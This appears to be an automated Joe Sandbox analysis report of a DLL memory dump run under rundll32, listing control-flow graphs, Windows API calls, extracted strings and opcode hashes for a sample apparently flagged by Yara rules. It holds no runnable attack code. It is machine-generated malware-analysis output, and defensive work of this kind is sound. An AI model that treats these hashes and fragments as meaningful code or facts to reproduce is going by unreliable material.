                                                                  control_flow_graph 4043 7fb40eff-7fb40f12 call 7fb413a0 4046 7fb40f14-7fb40f16 4043->4046 4047 7fb40f18-7fb40f3a call 7fb4086b 4043->4047 4048 7fb40f81-7fb40f90 4046->4048 4051 7fb40fa7-7fb40fc0 call 7fb41417 call 7fb413a0 4047->4051 4052 7fb40f3c-7fb40f7f call 7fb40936 call 7fb415d8 call 7fb41639 call 7fb40f94 call 7fb40ad7 call 7fb40fa1 4047->4052 4064 7fb40fd1-7fb40fd8 4051->4064 4065 7fb40fc2-7fb40fc8 4051->4065 4052->4048 4066 7fb40fe4-7fb40ff8 dllmain_raw 4064->4066 4067 7fb40fda-7fb40fdd 4064->4067 4065->4064 4069 7fb40fca-7fb40fcc 4065->4069 4072 7fb410a1-7fb410a8 4066->4072 4073 7fb40ffe-7fb4100f dllmain_crt_dispatch 4066->4073 4067->4066 4071 7fb40fdf-7fb40fe2 4067->4071 4070 7fb410aa-7fb410b9 4069->4070 4075 7fb41015-7fb41017 4071->4075 4072->4070 4073->4072 4073->4075 4077 7fb4101a call 7fb3c5a0 4075->4077 4079 7fb4101f-7fb41027 4077->4079 4081 7fb41050-7fb41052 4079->4081 4082 7fb41029-7fb4102b 4079->4082 4085 7fb41054-7fb41057 4081->4085 4086 7fb41059-7fb4106a dllmain_crt_dispatch 4081->4086 4082->4081 4084 7fb4102d-7fb4102f 4082->4084 4088 7fb41032 call 7fb3c5a0 4084->4088 4085->4072 4085->4086 4086->4072 4087 7fb4106c-7fb4109e dllmain_raw 4086->4087 4087->4072 4090 7fb41037-7fb4104b call 7fb40eff dllmain_raw 4088->4090 4090->4081
                                                                  APIs
                                                                  • __RTC_Initialize.LIBCMT ref: 7FB40F46
                                                                  • ___scrt_uninitialize_crt.LIBCMT ref: 7FB40F60
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Initialize___scrt_uninitialize_crt
                                                                  • String ID:
                                                                  • API String ID: 2442719207-0
                                                                  • Opcode ID: 301e6c74e7f779dee55c8e25f75a59e814f3ecae9eb5deba216bd5ac2a324254
                                                                  • Instruction ID: 67deb2b1fe7163d3610df27823b25d5fcb94ce0cf1187ee2944affc65c0317a0
                                                                  • Opcode Fuzzy Hash: 301e6c74e7f779dee55c8e25f75a59e814f3ecae9eb5deba216bd5ac2a324254
                                                                  • Instruction Fuzzy Hash: 6E41A6B2D05355EFDB128F65EE00BBE3675EBC46B0F21512AE8156A280D7305D01AB90

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 4160 7fb40faf-7fb40fc0 call 7fb413a0 4163 7fb40fd1-7fb40fd8 4160->4163 4164 7fb40fc2-7fb40fc8 4160->4164 4165 7fb40fe4-7fb40ff8 dllmain_raw 4163->4165 4166 7fb40fda-7fb40fdd 4163->4166 4164->4163 4167 7fb40fca-7fb40fcc 4164->4167 4170 7fb410a1-7fb410a8 4165->4170 4171 7fb40ffe-7fb4100f dllmain_crt_dispatch 4165->4171 4166->4165 4169 7fb40fdf-7fb40fe2 4166->4169 4168 7fb410aa-7fb410b9 4167->4168 4172 7fb41015-7fb41027 call 7fb3c5a0 4169->4172 4170->4168 4171->4170 4171->4172 4175 7fb41050-7fb41052 4172->4175 4176 7fb41029-7fb4102b 4172->4176 4178 7fb41054-7fb41057 4175->4178 4179 7fb41059-7fb4106a dllmain_crt_dispatch 4175->4179 4176->4175 4177 7fb4102d-7fb4104b call 7fb3c5a0 call 7fb40eff dllmain_raw 4176->4177 4177->4175 4178->4170 4178->4179 4179->4170 4180 7fb4106c-7fb4109e dllmain_raw 4179->4180 4180->4170
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                  • String ID:
                                                                  • API String ID: 3136044242-0
                                                                  • Opcode ID: 70345880c9ec40dff6f5f25df65b3b65a682deb31af089c801f52ea189002922
                                                                  • Instruction ID: b2a4666d1a83504bed0009d6696112004eec379efedbf2c55746afa04982bdfd
                                                                  • Opcode Fuzzy Hash: 70345880c9ec40dff6f5f25df65b3b65a682deb31af089c801f52ea189002922
                                                                  • Instruction Fuzzy Hash: DC2144B2D01355AFDB238E65EA40ABF3A79EBC06E0F115119F8065B354E7315D41ABD0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __floor_pentium4
                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                  • API String ID: 4168288129-2761157908
                                                                  • Opcode ID: d4e6bb169e0da620635a43b0c95d9d00cd60f914fd3a65033dc425fd01b7f195
                                                                  • Instruction ID: 93e6edea56dab1338fa474133fff3c17730eda7096152e789d486ab9abfd9f50
                                                                  • Opcode Fuzzy Hash: d4e6bb169e0da620635a43b0c95d9d00cd60f914fd3a65033dc425fd01b7f195
                                                                  • Instruction Fuzzy Hash: 1CD24EB1E082288FDB65CE24ED407D9B7B6FB48304F5446EAD41EE7240E778AE858F51
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,7FB5AD9A,00000002,00000000,?,?,?,7FB5AD9A,?,00000000), ref: 7FB5AB15
                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,7FB5AD9A,00000002,00000000,?,?,?,7FB5AD9A,?,00000000), ref: 7FB5AB3E
                                                                  • GetACP.KERNEL32(?,?,7FB5AD9A,?,00000000), ref: 7FB5AB53
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID: ACP$OCP
                                                                  • API String ID: 2299586839-711371036
                                                                  • Opcode ID: 3aca965edd2884116705f54a1982f17e583572a890170d3be0752105cca02e13
                                                                  • Instruction ID: b4610d9de495c19994fdf9984ea398004189e182726b0c889e159ed50c385e52
                                                                  • Opcode Fuzzy Hash: 3aca965edd2884116705f54a1982f17e583572a890170d3be0752105cca02e13
                                                                  • Instruction Fuzzy Hash: 0821B86A600204AAE7168F65EA10BC773BFEF44A60B568525E907FF104F736E942C790
                                                                  APIs
                                                                    • Part of subcall function 7FB51EEC: GetLastError.KERNEL32(?,00000008,7FB5699C), ref: 7FB51EF0
                                                                    • Part of subcall function 7FB51EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7FB51F92
                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 7FB5AD5D
                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 7FB5ADA6
                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 7FB5ADB5
                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 7FB5ADFD
                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 7FB5AE1C
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                  • String ID:
                                                                  • API String ID: 415426439-0
                                                                  • Opcode ID: 4f6687c64dca35df77880c0dd6024a6f9a216a496e290d5fcd45b5bc9e70192c
                                                                  • Instruction ID: 4daab68101ac9b3e477d7ff5f21f4c4248bbdbf69013c0882f8f0e9602f176ba
                                                                  • Opcode Fuzzy Hash: 4f6687c64dca35df77880c0dd6024a6f9a216a496e290d5fcd45b5bc9e70192c
                                                                  • Instruction Fuzzy Hash: E25182B6A003099FDB11EFA5EC40BEA77BCFF08701F144565E912FB190EB78A9058B60
                                                                  APIs
                                                                    • Part of subcall function 7FB51EEC: GetLastError.KERNEL32(?,00000008,7FB5699C), ref: 7FB51EF0
                                                                    • Part of subcall function 7FB51EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7FB51F92
                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,7FB52932,?,?,?,00000055,?,-00000050,?,?,00000001), ref: 7FB5A3AE
                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7FB52932,?,?,?,00000055,?,-00000050,?,?), ref: 7FB5A3D9
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 7FB5A53C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                  • String ID: utf8
                                                                  • API String ID: 607553120-905460609
                                                                  • Opcode ID: 3dac4791e4ea6901f0dc6c33651b7229fda8a6014df836cac0d13aacec0fcde3
                                                                  • Instruction ID: 474b07e1c6294d00bcfdb7d7d31b092afd1768faa9e063f4eaca1927732f5cf4
                                                                  • Opcode Fuzzy Hash: 3dac4791e4ea6901f0dc6c33651b7229fda8a6014df836cac0d13aacec0fcde3
                                                                  • Instruction Fuzzy Hash: 6171E5B5A00306AAEB15DB75EC45BAA73BDEF44714F104529EA06EB180FB7CE9418760
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _strrchr
                                                                  • String ID:
                                                                  • API String ID: 3213747228-0
                                                                  • Opcode ID: 30751736de5bae8b5dd7a50bf91012a2f7c7320bebe9c7af6a7a9e7fe88613c8
                                                                  • Instruction ID: 128f4b5dd3fa2fce3f3f70b6cd4f88636717f21bc6c3432d1efe79b719f1be6c
                                                                  • Opcode Fuzzy Hash: 30751736de5bae8b5dd7a50bf91012a2f7c7320bebe9c7af6a7a9e7fe88613c8
                                                                  • Instruction Fuzzy Hash: 2EB15972D043459FEF068F68E8C07EEBFB5EF45348F14416AF406AB245E279A901CBA0
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7FB41423
                                                                  • IsDebuggerPresent.KERNEL32 ref: 7FB414EF
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7FB41508
                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 7FB41512
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                  • String ID:
                                                                  • API String ID: 254469556-0
                                                                  • Opcode ID: 892173f2d9a7fe7c080caaf2884fa3f2b692795467e56411d09a24367e823659
                                                                  • Instruction ID: d1f14ed104e4d87b20c4f891943a27c948ed0db56751342a60bbd12c0cb04208
                                                                  • Opcode Fuzzy Hash: 892173f2d9a7fe7c080caaf2884fa3f2b692795467e56411d09a24367e823659
                                                                  • Instruction Fuzzy Hash: 77311AB9D013189BDB21DFA1D9497CDBBB8EF08310F20419AE40DAB250EB719B85DF55
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <$@$`
                                                                  • API String ID: 0-4173208228
                                                                  • Opcode ID: dbccd9bf6391d7fc71c88c79272d01ec47768981ba31096339309fda51bfe250
                                                                  • Instruction ID: 3485a4754e5f4b5564a78c56ec9c48dcfbec54fb7e0f4a73bd4c634400e254cc
                                                                  • Opcode Fuzzy Hash: dbccd9bf6391d7fc71c88c79272d01ec47768981ba31096339309fda51bfe250
                                                                  • Instruction Fuzzy Hash: B1339CB8E052698FDB69CF58C890BD9BBB1BF89304F1081DAD949A7355D730AE81CF44
                                                                  APIs
                                                                    • Part of subcall function 7FB51EEC: GetLastError.KERNEL32(?,00000008,7FB5699C), ref: 7FB51EF0
                                                                    • Part of subcall function 7FB51EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7FB51F92
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7FB5A754
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7FB5A79E
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7FB5A864
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InfoLocale$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 661929714-0
                                                                  • Opcode ID: e4747d2891b01ff8a23ac2c20ce80daedb5932fd10511c6f8f47981019e8af48
                                                                  • Instruction ID: aaa7311e265ab9944b632adbfadf92cdcd0ac56238a0bb0e9a6d1ae1da6f9eb2
                                                                  • Opcode Fuzzy Hash: e4747d2891b01ff8a23ac2c20ce80daedb5932fd10511c6f8f47981019e8af48
                                                                  • Instruction Fuzzy Hash: F1619E719103179BEB19DE29ED81BAAB7BDEF44310F10417AE906EB184F738E942CB50
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 7FB4539B
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 7FB453A5
                                                                  • UnhandledExceptionFilter.KERNEL32(7FB64F78,?,?,?,?,?,00000000), ref: 7FB453B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                  • String ID:
                                                                  • API String ID: 3906539128-0
                                                                  • Opcode ID: e89053a8336197898083cd003ecdedf2e5b31f600968999965493c0075c20c87
                                                                  • Instruction ID: 26f8c51f3edbb99d60c039b6cd4757b8cc31f5d9c1b28d1ef317535807331006
                                                                  • Opcode Fuzzy Hash: e89053a8336197898083cd003ecdedf2e5b31f600968999965493c0075c20c87
                                                                  • Instruction Fuzzy Hash: D431F575D013189BCB21DF25D9887DDBBB8EF08310F6051DAE41DA7290EB709B858F55
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$@$PE
                                                                  • API String ID: 0-2458287169
                                                                  • Opcode ID: f547878c6b8ac1478363833223487b57aae59ef77de798bc77e05dc905b5f444
                                                                  • Instruction ID: e5504113474c37baebb8c133da36d08819e9f47fefb55f2e1b700e3e831fbfe4
                                                                  • Opcode Fuzzy Hash: f547878c6b8ac1478363833223487b57aae59ef77de798bc77e05dc905b5f444
                                                                  • Instruction Fuzzy Hash: A25292B4E01229DFDB24CFA8D990BDDBBB1BF48304F1081A9D809AB345D735AA85CF50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: |J$D
                                                                  • API String ID: 0-12622807
                                                                  • Opcode ID: 1459e0f0bfcd150688df10174be9a2120727be3e2625bbf8a8e11d07d34b584d
                                                                  • Instruction ID: 6d9461024122bcaeffa1cef8ad2a0ef3a732773b2fc0ae86ff8599d282ae0949
                                                                  • Opcode Fuzzy Hash: 1459e0f0bfcd150688df10174be9a2120727be3e2625bbf8a8e11d07d34b584d
                                                                  • Instruction Fuzzy Hash: 6F238CB8E052698FDB65CF18C890BD9BBB1BF89305F1081DAD84DA7355DB30AA81CF54
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: |J$D
                                                                  • API String ID: 0-12622807
                                                                  • Opcode ID: 4fa1373e1bbb5907ccd874c38eba2edc070d91e1d0a797d2817a55b770e06ac5
                                                                  • Instruction ID: 89856fade27dac48c45a00a62bbbd4d00d43f696bccd4214331628637d24ba9f
                                                                  • Opcode Fuzzy Hash: 4fa1373e1bbb5907ccd874c38eba2edc070d91e1d0a797d2817a55b770e06ac5
                                                                  • Instruction Fuzzy Hash: A103ACB8E052698FDB69CF18C890BD9BBB1BF89304F1081DAD84DA7355D730AA85CF54
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: e$e
                                                                  • API String ID: 0-2104337576
                                                                  • Opcode ID: c698a5eec32c850d4867c8b76bfa0645ab5741f3492c430c6273625189b7c379
                                                                  • Instruction ID: 1c37db02ad3a6063addf081ecbe9f5b8b1b59babd0da2ecc21eddc6939255f8b
                                                                  • Opcode Fuzzy Hash: c698a5eec32c850d4867c8b76bfa0645ab5741f3492c430c6273625189b7c379
                                                                  • Instruction Fuzzy Hash: 4D039DB8E052698FDB69CF18C890BD9BBB6BF49304F1081DAD849A7345D730AE85CF54
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _memcpy_s
                                                                  • String ID: |J$D
                                                                  • API String ID: 2001391462-12622807
                                                                  • Opcode ID: d7cf5f6fe387598bf5fe87b558e28476a4758cc28198685f79a7add7557a25c2
                                                                  • Instruction ID: 9689cacf483e8c85caa57c001c0a65d2d8d50ce07a97fd49262af4bf785bbac5
                                                                  • Opcode Fuzzy Hash: d7cf5f6fe387598bf5fe87b558e28476a4758cc28198685f79a7add7557a25c2
                                                                  • Instruction Fuzzy Hash: E703ACB8E052698FDB69CF58C890BDDBBB5BF89304F1081DAD849A7355D730AA81CF44
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7af5a88747a61b5c2432c45f089c59faf2ec72d18a3311d2486f70010d347518
                                                                  • Instruction ID: 736ceaf7d81482ec35dfdc47a5ec31ae0cd99e5858f697865b889453307bb0bf
                                                                  • Opcode Fuzzy Hash: 7af5a88747a61b5c2432c45f089c59faf2ec72d18a3311d2486f70010d347518
                                                                  • Instruction Fuzzy Hash: 9AF16071E012199FDF14CFA8D9806ADB7B2FF88314F159269D816EB384E730A905CF90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: |J$D
                                                                  • API String ID: 0-12622807
                                                                  • Opcode ID: 4903eb0bb6d0e4909730d082c2634f8965f3d4b7b2ba9034fae37431501e9348
                                                                  • Instruction ID: 87aba6a422940591d5aaac928e77a43f4e7c95d820017b4ee7b4796cc76c0434
                                                                  • Opcode Fuzzy Hash: 4903eb0bb6d0e4909730d082c2634f8965f3d4b7b2ba9034fae37431501e9348
                                                                  • Instruction Fuzzy Hash: 2D728B78E052698FDB69CF68D990BDDBBB1BF49304F1081DAD849AB345D730AA81CF50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: |J$D
                                                                  • API String ID: 0-12622807
                                                                  • Opcode ID: 2ce78378f88a8c355863faaed04f74f7eb43ac9e6844a8217d6ce54d68dfb856
                                                                  • Instruction ID: d9dc2a2e00caf5ee7d9252b5b50609899bdd6e1bc0d3682f8ed696aa7ebd46c4
                                                                  • Opcode Fuzzy Hash: 2ce78378f88a8c355863faaed04f74f7eb43ac9e6844a8217d6ce54d68dfb856
                                                                  • Instruction Fuzzy Hash: 6D728DB8E052698FDB65CF68D890BDDBBB2BF49304F1081DAD849A7345D730AA85CF50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: |J
                                                                  • API String ID: 0-1146653492
                                                                  • Opcode ID: 4d95a287c7b7d91d90a58be456e655b1176378674787c01f3d21ebf1ded68abb
                                                                  • Instruction ID: c371567e6a138a83e08716a1807517df04602deed0b3281732ffd99f6c3464a6
                                                                  • Opcode Fuzzy Hash: 4d95a287c7b7d91d90a58be456e655b1176378674787c01f3d21ebf1ded68abb
                                                                  • Instruction Fuzzy Hash: 79039CB8E052698FDB69CF58C890BDDBBB1BF89304F1081DAD849A7355D730AA81CF54
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: 0722a31711cb53c87b6751ad502ece8a641f513ee22e16f4a059c02cd069f2aa
                                                                  • Instruction ID: d7d71f45ea9804024f971ee48824730284b12e6697a427d8d2c5eedc2992687b
                                                                  • Opcode Fuzzy Hash: 0722a31711cb53c87b6751ad502ece8a641f513ee22e16f4a059c02cd069f2aa
                                                                  • Instruction Fuzzy Hash: E3A29B78E052698FDB68CF58C894BDDBBB1BF89304F1081DAD849A7355D730AA81CF50
                                                                  APIs
                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,7FB51608,?,?,00000008,?,?,7FB60B55,00000000), ref: 7FB5183A
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExceptionRaise
                                                                  • String ID:
                                                                  • API String ID: 3997070919-0
                                                                  • Opcode ID: bc6b8efb9ed2c204834a7ff265ae0199ef184b9945b95af3a567a80cd8541e11
                                                                  • Instruction ID: 6134aac71803946b4b16973184400240026d0ec083476d3eaabf3f8d85f61537
                                                                  • Opcode Fuzzy Hash: bc6b8efb9ed2c204834a7ff265ae0199ef184b9945b95af3a567a80cd8541e11
                                                                  • Instruction Fuzzy Hash: A7B16A75610608DFE715CF28D486B947BF1FF85364F258658E89ACF2A2D339E982CB40
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __aullrem
                                                                  • String ID: N/A
                                                                  • API String ID: 3758378126-2525114547
                                                                  • Opcode ID: 079562f76abaae50e8191edc382ebc4fbcbfebe1674706428d7605f0a75220ca
                                                                  • Instruction ID: adb12f0c37f7969050e7b1a4f1485ebc58d76d7a1c16d93e18ea923506134181
                                                                  • Opcode Fuzzy Hash: 079562f76abaae50e8191edc382ebc4fbcbfebe1674706428d7605f0a75220ca
                                                                  • Instruction Fuzzy Hash: 73527D74E052688FDB65CFA8C990BDDBBB2BF49304F1481DAD849AB355D730AA81CF50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: e93432330e87a42e749fbb1401e4911d337bb281a632e57dc0a4777b36574a67
                                                                  • Instruction ID: 1658ee60e90437df8ce12e190a2ae3dab4774eee0df9c84ae448fddfa384e099
                                                                  • Opcode Fuzzy Hash: e93432330e87a42e749fbb1401e4911d337bb281a632e57dc0a4777b36574a67
                                                                  • Instruction Fuzzy Hash: 9722BF74D05268CFCB25CF98D990BDDBBB1BF49304F108199D859AB355DB30AA85CF50
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 7FB411E2
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FeaturePresentProcessor
                                                                  • String ID:
                                                                  • API String ID: 2325560087-0
                                                                  • Opcode ID: 61397a21159a1f9f5c5ff922ed7f798ce19baecff30751eaaa0afdcfc33be73d
                                                                  • Instruction ID: 5901974ddf56e264bc6ccc81c64da736b5ae345b354ef932fd3ad571e07bf184
                                                                  • Opcode Fuzzy Hash: 61397a21159a1f9f5c5ff922ed7f798ce19baecff30751eaaa0afdcfc33be73d
                                                                  • Instruction Fuzzy Hash: EB5192B6D113059BEB16CF66D5813BAB7F4FB84320F34912ED406EB240D374A911CB50
                                                                  Memory Dump Source
